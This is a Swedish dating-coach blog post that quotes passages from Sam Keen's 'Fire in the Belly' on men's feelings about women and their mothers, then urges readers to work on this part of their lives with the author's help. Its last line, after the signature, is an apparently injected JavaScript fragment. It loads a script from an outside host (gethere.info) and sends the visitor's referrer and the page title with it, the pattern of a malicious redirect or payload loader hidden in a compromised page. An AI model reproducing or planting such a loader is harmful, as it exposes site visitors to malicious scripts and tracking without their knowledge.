Hey guys!

Efter en skön helg med grabbarna i Stockholms nattliv sitter jag hemma med en kopp te och läser om en bok som gjorde stort intryck på mig första gången jag läste den och som jag återkommer till med jämna mellanrum för att den är så fundamental.

Jag pratar om ”Fire in the belly – On being a man” av Sam Keen. Jag ska inte gå in på allt vad boken handlar om i detalj, det här är inte rätt forum för det, men jag rekommenderar alla att läsa den!

Däremot är det några stycken i bokens inledning som får mig att tänka på alla män som aldrig tar steget för att lära sig behärska den delen i deras liv som kretsar kring kvinnor. Det är en mycket större del än de flesta skulle våga erkänna för sig själva! Han skriver:

I would guess that a majority of men never break free, never define manhood by weighing and testing their own experience. And the single largest reason is that we never acknowledge the primal power WOMAN wields over us. The average man spends a lifetime denying, defending against, trying to control, and reacting to the power of WOMAN. [...]

She is the center around which our lives circle. WOMAN is the mysterious ground of our being that we cannot penetrate. She is the audience before whom the dramas of our lives are played out. She is the judge who pronounces us guilty or innocent. She is the Garden of Eden from which we are exiled and the paradise for which our bodies long. She is the goddess who can grant us salvation and the frigid mother who denies us. She has a mythic power over us. She is at once terrifying and fascinating. [...]

One of the major tasks of manhood is to explore the unconscious feeling that surround our various images of WOMAN, to dispel false mystification, to dissolve the vague sense of threat and fear, and finally to learn to respect and love the strangeness of womankind.

Jag tror att han är inne på ett mycket viktigt spår. Som män kretsar en enormt stor del av vårt liv runt kvinnor, vår fascination av dem, vår vilja att ha dem runt oss och attrahera dem, att kunna vara och leva nära kvinnor på ett naturligt sätt som det alltid har varit meningen att vi ska! Ändå känner de flesta män sig mer eller mindre vilsna kring kvinnor. Det är därför det är ett så enormt stort frustrationsmoment för män att känna att de inte har kontroll på den här delen av sina liv, tänk efter – utan förmågan att attrahera en kvinna är du per definition steril!

Jag skulle vilja hävda att mycket av det de flesta män idag ägnar sig åt – strävan efter status och karriär, fixering vid utseende och pengar, viljan att vara till lags och inte stöta sig med andra – alla är symptom på deras dysfunktionella förhållningssätt och oförmåga att hantera kvinnor. Som män kommer vi aldrig att kunna ha sunda relationer till kvinnor som vi innerligt respekterar och älskar om vi inte först tar tag i våra egna ”issues” på området…

Min fråga till Dig är därför: Har du råd att fortsätta leva ett liv där du inte är nöjd med den här delen? Om inte, ta steget idag och se till att göra något åt det!

Imagine that long ago your mother wrote and inserted the software disk that preprogrammed your life. She etched the script for your life, inserted a philosophy-of-life program, on the blank pages of your mind. This set of instructions remains in the archaic layers of your psyche and continues to shape your perceptions and feelings well into adulthood. The language in which she wrote is as cryptic and difficult to decipher as ancient hieroglyphics, and yet to break the spell she has woven you must learn to decipher these early messages and bring the wordless information and misinformation into the light of consciousness.

In the degree that Mother remains a shadow presence in the life of a man, he will see himself and all women as if reflected in Mother’s eyes. He will perform for them as he performed for her, fearing displeasure, courting approval. The size of his ego and the size of his cock will be determined by what he sees in the mirror she holds.

Jag tycker iof att det är lite ”over the top” att säga att alla fel som män begår med kvinnor skulle vara deras mammas fel, och man kan definitivt gå för långt med psykologisk navelskådning på området. Men en sak är säker, jag har sett och ser män VARJE DAG som gör sig till för kvinnor på helt fel sätt, nedvärderar sig själva och allmänt ger bort sin egen kraft som individer för att vara andra till lags. Det funkar sällan, och i de fall det fungerar hade det varit bättre om det inte gjorde det, för det leder alltid till destruktiva beteenden som får båda parter att må sämre i slutändan!

Om du håller med om något av det jag citerar och tolkar, och om du känner att det är något som stämmer in på dig själv, om så bara lite grann – då har du INGEN bra anledning att inte ta tag i den här delen av ditt liv idag! Jag har påbörjat, kämpat och kommit långt med min egen resa till klarhet vad gäller kvinnor och relationer – det är ett av de bästa besluten jag någonsin tagit i mitt liv. Språket de skriver på är ofta lika svårt att tolka som hieroglyfer, det är sant. Som tur är har vi rosettastenen och finns här till din hjälp – ta den chansen!

-Sanji

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;